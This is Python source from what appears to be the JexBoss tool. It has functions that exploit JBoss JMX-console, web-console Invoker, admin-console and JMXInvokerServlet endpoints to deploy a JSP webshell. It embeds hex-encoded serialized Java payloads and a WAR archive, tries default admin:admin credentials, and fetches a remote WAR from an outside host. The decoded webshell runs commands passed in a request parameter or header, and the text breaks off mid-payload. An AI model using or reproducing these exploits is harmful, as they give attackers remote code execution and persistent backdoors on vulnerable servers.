def exploit_jmx_console_main_deploy(url): """ Exploit MainDeployer to deploy a JSP shell. Tested and working in JBoss 4, 6. (bug in JBoss 5). /jmx-console/HtmlAdaptor :param url: The url to exploit :return: The HTTP status code """ if not 'http' in url[:4]: url = "http://" + url jsp = "http://www.joaomatosf.com/rnp/jexws4.war" payload = ( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=" "MainDeployer&methodIndex=19&arg0=" + jsp) jexboss.print_and_flush( GREEN + "\n * Info: This exploit will force the server to deploy the webshell " + "\n available at: " + jsp + ENDC) headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent() } gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers) return get_successfully(url, "/jexws4/jexws4.jsp")
def get_successfully(url, path): """ Test if a GET to a URL is successful :param url: The base URL :param path: The URL path :return: The HTTP status code """ sleep(5) headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent() } r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers) result = r.status if result == 404: sleep(7) r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers) result = r.status return result
def exploit_web_console_invoker(url): """ Exploits web console invoker In Jboss 5, this method only works to deploy a .war within the server fs (not http). :param url: The URL to exploit :return: The HTTP status code """ payload = ( "\xAC\xED\x00\x05\x73\x72\x00\x2E\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x63\x6F\x6E\x73\x6F" "\x6C\x65\x2E\x72\x65\x6D\x6F\x74\x65\x2E\x52\x65\x6D\x6F\x74\x65\x4D\x42\x65\x61\x6E\x49\x6E\x76" "\x6F\x63\x61\x74\x69\x6F\x6E\xE0\x4F\xA3\x7A\x74\xAE\x8D\xFA\x02\x00\x04\x4C\x00\x0A\x61\x63\x74" "\x69\x6F\x6E\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72" "\x69\x6E\x67\x3B\x5B\x00\x06\x70\x61\x72\x61\x6D\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C" "\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x09\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x74" "\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x10" "\x74\x61\x72\x67\x65\x74\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x74\x00\x1D\x4C\x6A\x61\x76\x61" "\x78\x2F\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2F\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x3B" "\x78\x70\x74\x00\x06\x64\x65\x70\x6C\x6F\x79\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61" "\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00" "\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A" "\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74" "\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x01\x4C\x00\x04\x66\x69\x6C\x65" "\x71\x00\x7E\x00\x01\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x01\x4C\x00\x08\x70\x72\x6F\x74" "\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x01\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x01\x78\x70\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\x74\x00\x0E\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2E\x63\x6F\x6D\x74" "\x00\x0F\x2F\x72\x6E\x70\x2F\x6A\x65\x78\x77\x73\x34\x2E\x77\x61\x72\x71\x00\x7E\x00\x0B\x74\x00" "\x04\x68\x74\x74\x70\x70\x78\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53" "\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74" "\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x73\x72\x00\x1B\x6A\x61\x76\x61\x78\x2E" "\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x0F\x03\xA7" "\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x21\x6A\x62\x6F\x73\x73\x2E\x73\x79\x73\x74\x65" "\x6D\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x4D\x61\x69\x6E\x44\x65\x70\x6C\x6F\x79\x65\x72\x78" ) headers = { "Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation", "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent() } r = gl_http_pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) result = r.status if result == 401: jexboss.print_and_flush(" Retrying...") gl_http_pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) return get_successfully(url, "/jexws4/jexws4.jsp")
def exploit_admin_console(url, jboss_login): """ Exploits admin-console tested and works in JBoss 5 and 6 :param url: The URL to exploit :return: The HTTP status code """ # Use default password for Jboss 5 and 6 username = jboss_login.split(":")[0] password = jboss_login.split(":")[1] headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent() } r = gl_http_pool.request('GET', url + "/admin-console/login.seam", headers=headers) cookie = r.getheader('set-cookie').split(";")[0] headers['Cookie'] = cookie state = get_viewstat_admin_console(r.data) #payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login" # "&javax.faces.ViewState=%s" % (username, password, state)) payload = "login_form=login_form&login_form%3Aname=" + username + "&login_form%3Apassword="******"&login_form%3Asubmit=Login&javax.faces.ViewState=" + url_encode( state) headers['Content-Type'] = "application/x-www-form-urlencoded" if jboss_login == "admin:admin": jexboss.print_and_flush( GREEN + "\n * Info: Trying to perform authentication with default credentials..." + ENDC) else: jexboss.print_and_flush( GREEN + "\n * Info: Trying to perform authentication with credentials: %s" + ENDC) % (jboss_login) r = gl_http_pool.request('POST', url + "/admin-console/login.seam", body=payload, headers=headers, redirect=False) state = get_viewstat_admin_console(r.data) if r.status == 302: jexboss.print_and_flush(GREEN + " * Info: Successfully logged in! Wait..." + ENDC) location = r.getheader('Location') conversation_id = location.split('=')[1] r = gl_http_pool.request('GET', location, headers=headers) if state == None: sleep(7) r = gl_http_pool.request( 'GET', url + "/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR" "%29&conversationId=" + conversation_id + "&conversationPropagation=end", headers=headers) conversation_id = str(int(conversation_id) + 1) r = gl_http_pool.request( 'GET', url + "/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType" "Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId=" + conversation_id, headers=headers) state = get_viewstat_admin_console(r.data) headers[ 'Content-Type'] = "multipart/form-data; boundary=---------------------------551367293438156646377323759" payload = ( "\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00\x05\xBC\x5E\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x09\x00\x04\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x03\x00\x50\x4B" "\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00" "\x05\xBC\x5E\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4D\x45\x54\x41" "\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54\x2E\x4D\x46\xF3\x4D\xCC\xCB\x4C\x4B\x2D\x2E" "\xD1\x0D\x4B\x2D\x2A\xCE\xCC\xCF\xB3\x52\x30\xD4\x33\xE0\xE5\x72\x2E\x4A\x4D\x2C\x49\x4D\xD1\x75" "\xAA\x04\x09\x58\xE8\x19\xC4\x9B\x9B\x2B\x68\xF8\x17\x25\x26\xE7\xA4\x2A\x38\xE7\x17\x15\xE4\x17" "\x25\x96\x00\x95\x6B\xF2\x72\xF1\x72\x01\x00\x50\x4B\x07\x08\x05\xA0\x0E\xBC\x43\x00\x00\x00\x44" "\x00\x00\x00\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00\xEF\xBB\x5E\x49\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x0A\x00\x00\x00\x6A\x65\x78\x77\x73\x34\x2E\x6A\x73\x70\x95\x55\xDB\x6E\xDB" "\x38\x10\x7D\xDF\xAF\x60\x08\x04\x10\x1B\x5B\x4E\x16\xFB\xD0\x46\x51\xB0\xD9\x6E\x82\x74\x51\x6C" "\x83\x5C\xB0\x05\x82\xA0\x90\xA8\xB1\xC5\x84\x26\x59\x92\xB2\x1D\xB8\xFA\xF7\x0E\x29\x5F\xE3\x20" "\xE8\xBE\x08\xE4\x70\x66\x78\xE6\xCC\x19\xEA\x64\xFF\x4F\x62\x8A\x11\x10\x31\x36\xDA\xFA\x9C\x3E" "\x16\x93\x22\x95\x85\x1A\xA5\xEF\x7A\x71\xDD\x78\x21\x97\x6B\xA1\x97\x2B\x05\x3E\x7D\x47\x63\xE8" "\xB9\xE2\xBA\x12\x6A\x94\xD3\xBB\xDB\x8B\xFE\x7B\xBA\x7F\x4A\x4E\x8C\x05\xFC\xEE\x13\x2E\x0B\xE7" "\x88\x9D\x10\x98\x79\x50\x95\x23\xB7\xB5\x85\xA2\x9A\x7F\x52\xA6\xF1\x37\x1E\xD7\x63\x22\x5C\xF6" "\xA5\xF1\xEB\xBD\x76\x99\x9D\x24\xDB\x1E\xBD\x17\x1E\x6C\xEE\x6B\xE1\x52\xE1\x72\x8C\x8E\x4B\xED" "\x72\x0C\x6C\x4D\x53\x4A\xC1\xC9\x44\x8B\x8A\xD8\x46\x25\x6C\xFE\x57\x33\x1C\x82\x85\xEA\x1A\xEF" "\x05\x4B\x84\xCA\x55\x23\x65\xB6\x34\xFF\x67\x85\x47\xB3\x6E\x7C\x67\xF7\xF6\x79\x1E\x7C\x60\x4A" "\xB6\x23\x93\x60\xDA\x40\xB5\xB0\x2E\x70\x30\x96\xC5\x14\x1B\x61\x5D\xE6\x18\xB6\x89\x7E\x61\x5E" "\x80\xC6\x38\x5E\x17\x96\x94\xF7\x0F\x31\x38\x6C\xEE\xDF\x1F\x7D\xF8\xFD\x21\x13\xCA\x13\x99\x4D" "\x6B\x21\x21\x49\x64\x2E\x54\x1A\xA8\x4B\xCA\xDE\x61\xAF\x4C\x25\xA8\x91\xAF\x19\x3B\x3D\x64\x73" "\xBC\x38\x9D\x86\xAC\xF1\x4C\x46\x24\xE9\x50\x36\xAE\x4E\x58\xD6\xB6\xBC\xF0\xBC\x4E\xCE\x67\x1C" "\x8C\x17\x5A\x11\x60\xF3\xB6\x6D\x11\x0C\xF6\x8C\xB8\xBA\x2B\x5B\x0C\x13\x0B\xDF\x1B\x70\x3E\x1D" "\x81\xBF\x2A\x6C\x31\x86\x00\x93\x1A\x63\x28\xDB\x8B\x4E\x6C\x8E\xDE\x6F\x78\x65\x2D\x48\x87\x4A" "\xDA\x4A\x75\xD9\xD1\x44\xBF\xF6\xFF\x39\xFF\x1A\x32\x91\xD7\x52\xBD\xF0\xCA\x5A\x4C\xE2\x6A\xB2" "\xF2\xB6\xE0\x8C\x56\x0E\x52\x07\xFE\xA3\x56\xA8\x25\x7F\xFB\x6C\x20\xA1\x1E\x85\x35\xA8\xFD\x58" "\x62\xD0\x8B\x4E\x97\xB6\x2B\x6D\x51\xA9\xAC\x79\x1E\x9B\xF1\x77\x81\x4C\xB1\xD4\xEB\xEE\x00\x97" "\xCE\x48\xE1\x13\x7A\x4C\xD9\xFD\xE1\xC3\x01\xAD\x53\xA9\x47\x94\x21\xDD\x46\x16\x1C\xCE\xA4\x4C" "\x28\xA1\x3D\xDA\xC7\x3B\xA2\x3C\x5E\x2D\x50\xE9\x3E\xAF\x81\x3F\xF5\x1B\x53\xE1\x0D\x8E\xB2\x7C" "\xC1\xDA\xA5\xF7\xE6\xEE\xFA\x33\xE2\x56\xC0\x63\x0B\x10\xC9\x8E\x91\x05\x6C\x68\x49\x68\x8D\x47" "\xC7\x83\xC1\x14\x4A\x57\x83\x94\xE9\x23\xCC\x4A\xED\x5C\x98\xB9\xC1\xA3\x33\xDF\x26\x60\x1D\x06" "\xA4\x7E\xE6\x11\xA5\x36\xA0\xD6\x59\xB0\xE3\x3C\x90\x74\xDD\x01\xBC\xB2\x78\x6C\xFD\x73\x42\xEF" "\x1C\xD8\xFE\xD9\x08\x89\xA3\xBD\x57\xD0\x5F\x6A\x87\xC9\x0E\xE8\x49\x9F\x1E\x6C\x1C\x5F\xC3\x58" "\x7B\x38\xAB\x2A\x9B\xA0\x52\xB1\xF0\xBD\x80\xF2\x22\x48\x92\xC6\x6A\xBF\xD1\x03\x24\x96\xA5\x30" "\x13\xCE\x3B\x74\x9A\x5F\x21\xA9\x7E\x31\x55\xD3\xA8\xE9\x0D\xCB\x76\x54\x36\x4D\xB9\xD4\x0E\xBB" "\x91\x85\x66\xFD\xEA\xC8\xF1\x80\x6C\xC3\x8C\xB7\xB2\x55\x97\x27\x79\x69\xE3\xA0\x7C\x16\x0A\xD6" "\xBD\x25\xD8\xDB\xA3\x87\x58\x81\x9C\xA4\x58\x60\x21\x5D\x42\xFF\xA0\xAC\x1B\x1F\x13\x20\x26\xF4" "\x5F\xBC\x6F\xC9\x2E\xB9\x92\x50\xA0\x9C\xBB\x76\xEE\x05\x51\xAE\xF4\xED\xEA\x54\xA8\x0A\x66\x5F" "\x86\x09\x15\x55\x50\x75\xFF\xE8\xC7\x8F\x2D\xAB\xE1\x5A\x0D\xC5\xA8\x3B\x63\xF3\x5D\xCC\x98\xEE" "\xB5\xD1\x5C\xA1\x91\x2A\xA1\x17\x05\x32\x5D\x11\xAF\x49\xA4\x8D\x0C\xB5\x25\x2B\x79\x65\x6D\x10" "\x23\x76\x98\x03\xBE\xB1\x26\x2B\xB5\x46\xC4\x8A\x28\x31\xCB\xBD\x6D\x20\x16\x7B\xF3\xEC\x3C\x8C" "\xE3\xB4\xAE\xA4\x30\xC4\xA4\xA8\x11\x83\xE3\xEB\xB5\x45\x09\x2D\xE9\x18\x04\x3A\x42\xF8\x10\xB7" "\xB0\x18\xC2\x75\x4D\xA8\x43\x1B\xF5\x90\x2F\xAB\xBA\xD1\xFC\x09\x3C\x71\x3C\x36\xAF\xDB\x85\x90" "\x05\xE9\x79\x24\x7D\x7B\xBC\x7A\x9F\x70\x7A\x47\x60\x53\xBC\xDE\x01\x6E\x36\xFC\x8F\xA3\x7F\x27" "\x34\x84\x11\x1F\x09\x3A\x28\x85\x1A\x94\x85\xAB\x69\xF7\xBE\x44\x23\x1F\x57\x28\x39\x40\x93\xC9" "\xAF\x1B\xE5\xC5\x18\xA2\x5C\xBB\x65\x12\xF4\x08\x1C\x33\xB3\x2C\x6A\x08\xFF\x27\x66\xA7\x01\x3D" "\x17\x9B\xB2\xF9\x36\x07\x25\xA5\xCE\x17\xD6\x27\xEB\x48\xB7\xDB\xBB\x9E\x79\x33\xB2\xC3\xB9\x2C" "\xE2\x2D\x84\x91\xB6\xA8\xDC\xFB\x87\xF9\x46\xA9\xF8\xD8\x70\xDA\x73\x75\xBB\x4C\xF6\x56\x92\x25" "\x1B\x64\xF0\x91\xD0\x83\x50\x74\xFB\x7F\xC6\x69\x97\x99\xF5\x38\x55\xDB\xD3\xB4\xF8\x1B\x55\xEB" "\x87\x79\x53\xAE\x15\xCB\x5E\xFA\xFF\x82\xC6\xEF\xD4\x93\xD2\x53\x7C\x13\xF5\x78\x5C\xA8\x2A\xCE" "\xD9\xFE\xE9\x6F\x3F\x01\x50\x4B\x07\x08\x26\x77\xF3\x5E\xE3\x03\x00\x00\x99\x08\x00\x00\x50\x4B" "\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x05\xBC\x5E\x49\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00" "\x00\x00\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x45\x54\x41" "\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x50\x4B\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x05\xBC\x5E" "\x49\x05\xA0\x0E\xBC\x43\x00\x00\x00\x44\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x3D\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54" "\x2E\x4D\x46\x50\x4B\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\xEF\xBB\x5E\x49\x26\x77\xF3\x5E\xE3" "\x03\x00\x00\x99\x08\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC2\x00\x00" "\x00\x6A\x65\x78\x77\x73\x34\x2E\x6A\x73\x70\x50\x4B\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xB5" "\x00\x00\x00\xDD\x04\x00\x00\x00\x00") data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload) try: r = gl_http_pool.request( 'POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data) if r.status != 302: data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload) r = gl_http_pool.request( 'POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data) except: sleep(1) return get_successfully(url, "/jexws4/jexws4.jsp") else: jexboss.print_and_flush( RED + "\n * Failed authentication with username and password: %s.\n" " Please try again with another login and password!\n" + ENDC) % jboss_login sleep(4) return 404
def exploit_jmx_invoker_file_repository(url, version): """ Exploits the JMX invoker tested and works in JBoss 4, 5 MainDeploy, shell in data # /invoker/JMXInvokerServlet :param url: The URL to exploit :return: """ payload = ( "\xAC\xED\x00\x05\x73\x72\x00\x29\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63" "\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x49\x6E\x76\x6F\x63\x61\x74\x69" "\x6F\x6E\xF6\x06\x95\x27\x41\x3E\xA4\xBE\x0C\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xC1\xD0" "\x53\x87\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12" "\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x78\x72\x00\x10\x6A\x61" "\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00" "\x00\x78\x70") payload += ("\xE3\x2C\x60\xE6") if version == 0 else ("\x26\x95\xBE\x0A") payload += ( "\x73\x72\x00\x24\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76" "\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x56\x61\x6C\x75\x65\xEA" "\xCC\xE0\xD1\xF4\x4A\xD0\x99\x0C\x00\x00\x78\x70\x7A\x00\x00\x04\x00\x00\x00\x09\xD3\xAC\xED\x00" "\x05\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B" "\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1B\x6A\x61\x76" "\x61\x78\x2E\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65" "\x0F\x03\xA7\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x2C\x6A\x62\x6F\x73\x73\x2E\x61\x64" "\x6D\x69\x6E\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x44\x65\x70\x6C\x6F\x79\x6D\x65\x6E\x74\x46\x69" "\x6C\x65\x52\x65\x70\x6F\x73\x69\x74\x6F\x72\x79\x78\x74\x00\x05\x73\x74\x6F\x72\x65\x75\x71\x00" "\x7E\x00\x00\x00\x00\x00\x05\x74\x00\x0B\x6A\x65\x78\x69\x6E\x76\x34\x2E\x77\x61\x72\x74\x00\x07" "\x6A\x65\x78\x69\x6E\x76\x34\x74\x00\x04\x2E\x6A\x73\x70\x74\x08\x98\x3C\x25\x40\x20\x70\x61\x67" "\x65\x20\x69\x6D\x70\x6F\x72\x74\x3D\x22\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x2A\x2C\x6A\x61" "\x76\x61\x2E\x75\x74\x69\x6C\x2E\x2A\x2C\x6A\x61\x76\x61\x2E\x69\x6F\x2E\x2A\x2C\x6A\x61\x76\x61" "\x2E\x6E\x65\x74\x2E\x2A\x22\x20\x70\x61\x67\x65\x45\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54" "\x46\x2D\x38\x22\x25\x3E\x20\x3C\x70\x72\x65\x3E\x20\x3C\x25\x20\x63\x6C\x61\x73\x73\x20\x72\x76" "\x20\x65\x78\x74\x65\x6E\x64\x73\x20\x54\x68\x72\x65\x61\x64\x7B\x49\x6E\x70\x75\x74\x53\x74\x72" "\x65\x61\x6D\x20\x69\x73\x3B\x4F\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x6F\x73\x3B\x72" "\x76\x28\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x69\x73\x2C\x4F\x75\x74\x70\x75\x74\x53" "\x74\x72\x65\x61\x6D\x20\x6F\x73\x29\x7B\x74\x68\x69\x73\x2E\x69\x73\x3D\x69\x73\x3B\x74\x68\x69" "\x73\x2E\x6F\x73\x3D\x6F\x73\x3B\x7D\x70\x75\x62\x6C\x69\x63\x20\x76\x6F\x69\x64\x20\x72\x75\x6E" "\x28\x29\x7B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x69\x6E\x3D\x6E\x75\x6C" "\x6C\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x20\x6F\x75\x74\x3D\x6E\x75\x6C" "\x6C\x3B\x74\x72\x79\x7B\x69\x6E\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61" "\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65" "\x72\x28\x74\x68\x69\x73\x2E\x69\x73\x29\x29\x3B\x6F\x75\x74\x3D\x6E\x65\x77\x20\x42\x75\x66\x66" "\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x28\x6E\x65\x77\x20\x4F\x75\x74\x70\x75\x74\x53\x74\x72" "\x65\x61\x6D\x57\x72\x69\x74\x65\x72\x28\x74\x68\x69\x73\x2E\x6F\x73\x29\x29\x3B\x63\x68\x61\x72" "\x20\x62\x5B\x5D\x3D\x6E\x65\x77\x20\x63\x68\x61\x72\x5B\x38\x31\x39\x32\x5D\x3B\x69\x6E\x74\x20" "\x6C\x3B\x77\x68\x69\x6C\x65\x28\x28\x6C\x3D\x69\x6E\x2E\x72\x65\x61\x64\x28\x62\x2C\x30\x2C\x62" "\x2E\x6C\x65\x6E\x67\x74\x68\x29\x29\x3E\x30\x29\x7B\x6F\x75\x74\x2E\x77\x72\x69\x74\x65\x28\x62" "\x2C\x30\x2C\x6C\x29\x3B\x6F\x75\x74\x2E\x66\x6C\x75\x73\x68\x28\x29\x3B\x7D\x7D\x63\x61\x74\x63" "\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x20\x65\x29\x7B\x7D\x7D\x7D\x53\x74\x72\x69\x6E\x67" "\x20\x73\x68\x3D\x6E\x75\x6C\x6C\x3B\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50" "\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x21\x3D\x6E\x75\x6C\x6C\x29\x7B\x73" "\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22" "\x70\x70\x70\x22\x29\x3B\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67" "\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x58\x2D\x4A\x45\x58\x22\x29\x21\x3D\x20\x6E\x75\x6C\x6C" "\x29\x7B\x73\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22" "\x58\x2D\x4A\x45\x58\x22\x29\x3B\x7D\x69\x66\x28\x73\x68\x20\x21\x3D\x20\x6E\x75\x6C\x6C\x29\x7B" "\x72\x65\x73\x70\x6F\x6E\x73\x65\x2E\x73\x65\x74\x43\x6F\x6E\x74\x65\x6E\x74\x54\x79\x70\x65\x28" "\x22\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C\x22\x29\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61" "\x64\x65\x72\x20\x62\x72\x3D\x6E\x75\x6C\x6C\x3B\x53\x74\x72\x69\x6E\x67\x20\x6C\x68\x63\x3D\x28" "\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2E\x74\x6F\x53\x74\x72\x69\x6E\x67\x28\x29\x2E\x73\x70" "\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2B\x22\x68\x2E\x6C\x6F\x67\x22\x29\x2E\x72\x65\x70" "\x6C\x61\x63\x65\x41\x6C\x6C\x28\x22\x20\x22\x2C\x22\x2D\x22\x29\x3B\x74\x72\x79\x7B\x69\x66\x28" "\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x7A\x00\x00\x04\x00\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22" "\x6E\x6F\x2D\x63\x68\x65\x63\x6B\x2D\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3D\x3D\x6E\x75\x6C\x6C" "\x29\x7B\x48\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x20\x63\x3D\x28\x48" "\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x29\x6E\x65\x77\x20\x55\x52\x4C" "\x28\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x65\x62\x73\x68\x65\x6C\x6C\x2E\x6A\x65\x78\x62\x6F\x73" "\x73\x2E\x6E\x65\x74\x2F\x6A\x73\x70\x5F\x76\x65\x72\x73\x69\x6F\x6E\x2E\x74\x78\x74\x22\x29\x2E" "\x6F\x70\x65\x6E\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x28\x29\x3B\x63\x2E\x73\x65\x74\x52\x65" "\x71\x75\x65\x73\x74\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72\x2D\x41\x67\x65\x6E" "\x74\x22\x2C\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6F" "\x73\x74\x22\x29\x2B\x22\x3C\x2D\x22\x2B\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x52\x65\x6D" "\x6F\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3B\x69\x66\x28\x21\x6E\x65\x77\x20\x46\x69\x6C\x65\x28" "\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x2E\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7B" "\x50\x72\x69\x6E\x74\x57\x72\x69\x74\x65\x72\x20\x77\x3D\x6E\x65\x77\x20\x50\x72\x69\x6E\x74\x57" "\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x3B\x77\x2E\x63\x6C" "\x6F\x73\x65\x28\x29\x3B\x62\x72\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61" 